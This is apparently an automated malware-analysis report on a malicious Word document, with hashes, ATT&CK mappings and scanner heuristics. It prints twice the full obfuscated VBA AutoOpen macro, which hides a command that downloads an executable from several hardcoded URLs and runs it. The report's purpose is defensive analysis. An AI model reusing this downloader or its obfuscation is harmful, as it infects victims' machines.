Office (OLE) malware analysis — malicious · ab209e9e31d8f552

MALICIOUS

Office (OLE)

70.5 KB Created: 2018-10-01 03:32:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: a62132073d6f52f1b7ab377bfdb9fb94 SHA-1: 078d0186ab75b2e39e31e0818eceea3f93bd651a SHA-256: ab209e9e31d8f552fc7518aa916a0bcf1906d477fc314c70a227993b69350a24

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The macro attempts to construct and execute a command that downloads a second-stage payload from a hardcoded URL. The presence of the Shell() call and the ClamAV detection strongly indicate malicious intent.

Heuristics 6

ClamAV: Doc.Malware.00536d-6703105-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.00536d-6703105-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3963 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3963 bytes
SHA-256: `284e782ef74c3b3b11d28ce9a9f9b7a9768ae2c6e432cdd6e459a11dad284c1c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "HswWLUQCWVZf" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() If ClRuVP Eqv 6 Then BmIkY = "mqow" End If If wbbjH Xor YZrpk Then IsADiC = "MXqM" End If If azijw And YsiGz Then MzRzDQ = "H" End If If sSLpZl <= MSFwM Then aKNOX = "anNYOKzBk" End If If DHskw Or 5 Then hiFPH = "hH" End If If EYYcIq And 13 Then bKvIwP = "Y" End If JhzvaaqadHXE (KeyString(luuhbhFO + NGljtnZ + 15 + 4 + 48 + hIRww + Jzcmi) + ZwIrj + JLiHvinQ + KeyString(OBFNh + vbWXHmkA + 17 + 5 + 55 + Lkkvq + YzmpDb) + GjznOEH + MNuimBbhiT + iPuBlGJwWX + JJKXiv + RHfSsNV) If iSIvfB Xor lWfpjF Then tFsowZ = "h" End If If pCZRE <= ccwQjz Then jOvpoO = "mwl" End If If EJnSk <= zbFGdb Then jtCNi = "RvIJaDjPTGQs" End If If EtIKLQ Eqv 13 Then iuwiZ = "QcdqnDJCbR" End If End Sub Attribute VB_Name = "HATpKNZjVsdl" Function GjznOEH() zjKCKiMiU = "d /V/C" + """" + "^s^e^t ^B^J^" + "1=^ ^ ^ ^ ^ ^ ^ ^" + " ^ ^ ^ ^ ^ ^ ^ ^ ^" czJNL = " ^}^}{^hc^t" + "^ac}^;^k^a^er^b^;^F" + "^M^K^$^ ^m^e^" + "t^I-^e^k^ovn^I^" sskLwGilf = ";)^F^M^K^$^ ,E^A" + "^H^$(^e^l^i^F^" + "d^a^o^ln^w^o^" + "D^.^qn^K^$^{^yr" + "t^{)h^b^i^$^" pmfSAziCsrR = " n^i^ ^E^A^H^$(^hc^a" + "^er^of^;^'^e^x^e" + "^.^'^+^I^F^t^$+^'^" + "\^'^+ci^l^b^u^p^" + ":vn^e^$^=^F^M^K^$" VnFrvQVwm = ";^'^2^9^9^'^ " + "^=^ I^F^t^" + "$^;)^'^@^'(^" EEzaDnVfPpU = "t^i^l^p^S^.'^" + "9^UR^s^FR^I" + "5^y^S/^moc.^" GjznOEH = zjKCKiMiU + czJNL + sskLwGilf + pmfSAziCsrR + VnFrvQVwm + EEzaDnVfPpU If FTsfQl <= 12 Then mraSw = "f" End If If mbvWn Or 16 Then XXzRj = "fBn" End If End Function Function MNuimBbhiT() khbqAZTBsd = "w^o^lra^mna^i^t^s" + "^ir^k//:^p^t^t" + "^h^@R^6^d^1^Yc^x^K/" + "cc^.^tn^ec^s^er^" + "o^u^l^f//^:p" + "^t^t^h^@^P^2^uS" If vhEZzm <> YUSwf Then wfDwr = "j" End If If jptZG Xor oiYklS Then PRiuo = "tlWq" End If If LATFq And 7 Then PaNwTo = "GjI" End If If RuAzTw = qipoio Then QZWDGr = "VIuEzMUnZ" End If djzPjTOihW = "^Bv^Tc^1/r^b" + "^.^m^oc^.v^e^d" + "n^o^i^t^o^m//^" If CSZVO Eqv UTAQZm Then JdYlkf = "k" End If iRQlUFuQCn = ":^p^t^t^h^@^z^q^F" + "v^s^q^Oc^a^B/" + "^m^oc^.^a^dn^os^" + "i^d^a^m//^:" + "^p^t^t^h^@XR^" + "l^A^f^B^I/^m^oc.^" If jvBool = zWnOVM Then CzHDmU = "FhhcJ" End If If GsUmRC = WzOmY Then EHWlXu = "iI" End If uXLVQfVNzA = "i^j^ol^o^y" + "i^b^or^k^i^m^a" + "d^ig//^:^p" If iWBRiO = 5 Then LfUTq = "iQz" End If If pEwWf <> VBUhN Then nBDpmK = "V" End If If hwmWYk And DdsqwN Then MrabUO = "GhICt" End If aRICL = "^t^th^'^=^h^b^i^$" + "^;^tn^ei^lC^b^e^W^" + ".^t^eN^ ^tc^e^j^b^o" + "^-^wen^=^q" + "n^K^$^ ^l^l^e" MNuimBbhiT = khbqAZTBsd + djzPjTOihW + iRQlUFuQCn + uXLVQfVNzA + aRICL If iTfUm Xor ITEVpD Then jSiDj = "VFnWloTfM" End If If VYmdY < zLIzRh Then lbVjHb = "pIoiSF" End If If LSMkh > 1 Then SwurcI = "LR" End If End Function Function iPuBlGJwWX() rZrTMGHqXh = "^h^sr^e^w^o^p" + "&&^f^or /^L %^F " + "^in (3^8^0" + "^,^-^1^,^0)^" + "d^o ^s^e^t" + " ^L^y^G=!^L^y^G!!^B" PicHAcPtZ = "^J^1:~%^F,1!&&^i^" + "f %^F ^l^s^" + "s ^1 c^a^l^l %^" + "L^y^G:^~^5%" + """" iPuBlGJwWX = rZrTMGHqXh + PicHAcPtZ If qKblG > Jqwtf Then DvjwJ = "rbzdL" End If End Function Attribute VB_Name = "SHUhZOwXOw" Function JhzvaaqadHXE(YKIBwVS As String) Const AqorwRr = 16425839 - 16425839 If qiUMt <= ScuMw Then ADPZd = "a" End If If BbdUo Xor MqPja Then DUPia = "foiRI" End If If Wtjpn And UYjjTf Then wjrdVd = "kII" End If Shell# YKIBwVS, AqorwRr If mjNkOM <= TEJcU Then ardwDG = "GJjuf" End If If MQOEO Xor EEUkoX Then XwENc = "aEFjiA" End If If UHjjE >= kRUHzZ Then rDuul = "tz" End If End Function

SHA-256: 284e782ef74c3b3b11d28ce9a9f9b7a9768ae2c6e432cdd6e459a11dad284c1c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "HswWLUQCWVZf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   If ClRuVP Eqv 6 Then

BmIkY = "mqow"
End If
   If wbbjH Xor YZrpk Then

IsADiC = "MXqM"
End If
   If azijw And YsiGz Then

MzRzDQ = "H"
End If
   If sSLpZl <= MSFwM Then

aKNOX = "anNYOKzBk"
End If
   If DHskw Or 5 Then

hiFPH = "hH"
End If
   If EYYcIq And 13 Then

bKvIwP = "Y"
End If
JhzvaaqadHXE (KeyString(luuhbhFO + NGljtnZ + 15 + 4 + 48 + hIRww + Jzcmi) + ZwIrj + JLiHvinQ + KeyString(OBFNh + vbWXHmkA + 17 + 5 + 55 + Lkkvq + YzmpDb) + GjznOEH + MNuimBbhiT + iPuBlGJwWX + JJKXiv + RHfSsNV)
   If iSIvfB Xor lWfpjF Then

tFsowZ = "h"
End If
   If pCZRE <= ccwQjz Then

jOvpoO = "mwl"
End If
   If EJnSk <= zbFGdb Then

jtCNi = "RvIJaDjPTGQs"
End If
   If EtIKLQ Eqv 13 Then

iuwiZ = "QcdqnDJCbR"
End If
End Sub


Attribute VB_Name = "HATpKNZjVsdl"
Function GjznOEH()
zjKCKiMiU = "d /V/C" + """" + "^s^e^t ^B^J^" + "1=^ ^ ^ ^ ^ ^ ^ ^" + " ^ ^ ^ ^ ^ ^ ^ ^ ^"
czJNL = " ^}^}{^hc^t" + "^ac}^;^k^a^er^b^;^F" + "^M^K^$^ ^m^e^" + "t^I-^e^k^ovn^I^"
sskLwGilf = ";)^F^M^K^$^ ,E^A" + "^H^$(^e^l^i^F^" + "d^a^o^ln^w^o^" + "D^.^qn^K^$^{^yr" + "t^{)h^b^i^$^"
pmfSAziCsrR = " n^i^ ^E^A^H^$(^hc^a" + "^er^of^;^'^e^x^e" + "^.^'^+^I^F^t^$+^'^" + "\^'^+ci^l^b^u^p^" + ":vn^e^$^=^F^M^K^$"
VnFrvQVwm = ";^'^2^9^9^'^ " + "^=^ I^F^t^" + "$^;)^'^@^'(^"
EEzaDnVfPpU = "t^i^l^p^S^.'^" + "9^UR^s^FR^I" + "5^y^S/^moc.^"
GjznOEH = zjKCKiMiU + czJNL + sskLwGilf + pmfSAziCsrR + VnFrvQVwm + EEzaDnVfPpU
   If FTsfQl <= 12 Then

mraSw = "f"
End If
   If mbvWn Or 16 Then

XXzRj = "fBn"
End If
End Function
Function MNuimBbhiT()
khbqAZTBsd = "w^o^lra^mna^i^t^s" + "^ir^k//:^p^t^t" + "^h^@R^6^d^1^Yc^x^K/" + "cc^.^tn^ec^s^er^" + "o^u^l^f//^:p" + "^t^t^h^@^P^2^uS"
If vhEZzm <> YUSwf Then

wfDwr = "j"
End If
   If jptZG Xor oiYklS Then

PRiuo = "tlWq"
End If
   If LATFq And 7 Then

PaNwTo = "GjI"
End If
   If RuAzTw = qipoio Then

QZWDGr = "VIuEzMUnZ"
End If
djzPjTOihW = "^Bv^Tc^1/r^b" + "^.^m^oc^.v^e^d" + "n^o^i^t^o^m//^"
If CSZVO Eqv UTAQZm Then

JdYlkf = "k"
End If
iRQlUFuQCn = ":^p^t^t^h^@^z^q^F" + "v^s^q^Oc^a^B/" + "^m^oc^.^a^dn^os^" + "i^d^a^m//^:" + "^p^t^t^h^@XR^" + "l^A^f^B^I/^m^oc.^"
If jvBool = zWnOVM Then

CzHDmU = "FhhcJ"
End If
   If GsUmRC = WzOmY Then

EHWlXu = "iI"
End If
uXLVQfVNzA = "i^j^ol^o^y" + "i^b^or^k^i^m^a" + "d^ig//^:^p"
If iWBRiO = 5 Then

LfUTq = "iQz"
End If
   If pEwWf <> VBUhN Then

nBDpmK = "V"
End If
   If hwmWYk And DdsqwN Then

MrabUO = "GhICt"
End If
aRICL = "^t^th^'^=^h^b^i^$" + "^;^tn^ei^lC^b^e^W^" + ".^t^eN^ ^tc^e^j^b^o" + "^-^wen^=^q" + "n^K^$^ ^l^l^e"
MNuimBbhiT = khbqAZTBsd + djzPjTOihW + iRQlUFuQCn + uXLVQfVNzA + aRICL
   If iTfUm Xor ITEVpD Then

jSiDj = "VFnWloTfM"
End If
   If VYmdY < zLIzRh Then

lbVjHb = "pIoiSF"
End If
   If LSMkh > 1 Then

SwurcI = "LR"
End If
End Function
Function iPuBlGJwWX()
rZrTMGHqXh = "^h^sr^e^w^o^p" + "&&^f^or /^L %^F " + "^in (3^8^0" + "^,^-^1^,^0)^" + "d^o ^s^e^t" + " ^L^y^G=!^L^y^G!!^B"
PicHAcPtZ = "^J^1:~%^F,1!&&^i^" + "f %^F ^l^s^" + "s ^1 c^a^l^l %^" + "L^y^G:^~^5%" + """"
iPuBlGJwWX = rZrTMGHqXh + PicHAcPtZ
   If qKblG > Jqwtf Then

DvjwJ = "rbzdL"
End If
End Function


Attribute VB_Name = "SHUhZOwXOw"
Function JhzvaaqadHXE(YKIBwVS As String)
Const AqorwRr = 16425839 - 16425839
   If qiUMt <= ScuMw Then

ADPZd = "a"
End If
   If BbdUo Xor MqPja Then

DUPia = "foiRI"
End If
   If Wtjpn And UYjjTf Then

wjrdVd = "kII"
End If
Shell# YKIBwVS, AqorwRr
   If mjNkOM <= TEJcU Then

ardwDG = "GJjuf"
End If
   If MQOEO Xor EEUkoX Then

XwENc = "aEFjiA"
End If
   If UHjjE >= kRUHzZ Then

rDuul = "tz"
End If
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.